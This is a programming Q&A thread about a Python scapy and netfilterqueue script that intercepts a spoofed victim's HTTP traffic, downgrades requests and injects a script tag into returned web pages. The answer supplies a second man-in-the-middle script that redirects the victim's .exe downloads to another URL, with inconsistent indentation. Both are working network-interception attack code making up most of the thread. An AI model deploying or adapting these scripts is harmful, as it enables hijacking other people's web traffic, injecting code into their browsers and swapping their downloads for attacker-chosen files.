# if scapy_packet.haslayer(scapy.Raw).load: AttributeError: 'int' object has no attribute 'load'

Tags: python, scapy

I'm trying execute python code but I'm getting this error.

```
Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
  File "injecting_code.py", line 15, in process_packet
    if scapy_packet.haslayer(scapy.Raw).load:
AttributeError: 'int' object has no attribute 'load'
Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
  File "injecting_code.py", line 15, in process_packet
    if scapy_packet.haslayer(scapy.Raw).load:
AttributeError: 'int' object has no attribute 'load'
^CTraceback (most recent call last):
  File "injecting_code.py", line 38, in <module>
    queue.run()
KeyboardInterrupt
```

I'm trying to inject a code into a spoofed computer requests through port 80 which is http.
My Code is :

```
#!/usr/bin/env python

import scapy.all 
import netfilterqueue
import re


def set_load(pkt, load):
    pkt[scapy.all.Raw].load = load
    del pkt[scapy.all.IP].len
    del pkt[scapy.all.IP].chksum
    del pkt[scapy.all.TCP].chksum
    return pkt


def process_packet(pkt):
    scapy_packet = scapy.all.IP(pkt.get_payload())
    if scapy_packet.haslayer(scapy.all.TCP):

        if scapy_packet[scapy.all.TCP].dport == 80:
            print("[+] Request")

            if scapy_packet.haslayer(scapy.all.Raw):
                load = scapy_packet[scapy.all.Raw].load

                load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
                load = load.replace("HTTP/1.1", "HTTP/1.0")

                if load != scapy_packet[scapy.all.Raw].load:
                    new_packet = set_load(scapy_packet, load)
                    pkt.set_payload(str(new_packet))

        elif scapy_packet[scapy.all.TCP].sport == 80:
            print("[+] Response")

            if scapy_packet.haslayer(scapy.all.Raw):
                load = scapy_packet[scapy.all.Raw].load
                inject_code = "<script>alert('Test');</script>"
                load = load.replace("</body>", inject_code + "</body>")
                content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
                if content_length_search and "text/html" in load:
                    content_length = content_length_search.group(1)
                    new_content_length = int(content_length) + len(inject_code)
                    load = load.replace(content_length, str(new_content_length))

                if load != scapy_packet[scapy.all.Raw].load:
                    new_packet = set_load(scapy_packet, load)
                    pkt.set_payload(str(new_packet))

    pkt.accept()    


queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    print(" ")
```

I have started iptables and ip forwarding before executing the program. I'm not able to find what's missing.
Please help me out.

Comment: Add the code as well.

Comment: Also, `has_layer()` is True/False... Calling `has_layer(...).load` makes no sense

Answer (score 0):

use the full code it don't give the error, e.g.

```
#!/usr/bin/env python
import scapy.all as scapy
import netfilterqueue
ack_list=[]
def process_packet(packet):
   scapy_packet=scapy.IP(packet.get_payload())
   if scapy_packet.haslayer(scapy.Raw):
       if scapy_packet[scapy.TCP].dport==80:
           if ".exe" in scapy_packet[scapy.Raw].load:
               print("[+]exe Reaquest........\n\n")
               ack_list.append(scapy_packet[scapy.TCP].ack)
        elif scapy_packet[scapy.TCP].sport==80:
            if scapy_packet[scapy.TCP].seq in ack_list:
                ack_list.remove(scapy_packet[scapy.TCP].seq)
                print("[+]Replaing file....\n\n")
                scapy_packet[scapy.Raw].load="HTTP/1.1 301 Moved Permanently\nLocation: https://www.win-rar.com/postdownload.html?&L=0\n\n"
                del scapy_packet[scapy.IP].len
                del scapy_packet[scapy.TCP].chksum
                del scapy_packet[scapy.IP].chksum
                packet.set_payload(str(scapy_packet))
    packet.accept()
queue=netfilterqueue.NetfilterQueue()
queue.bind(0,process_packet)
queue.run()
```

Comment: this will definetely works for you bro try it and enjoy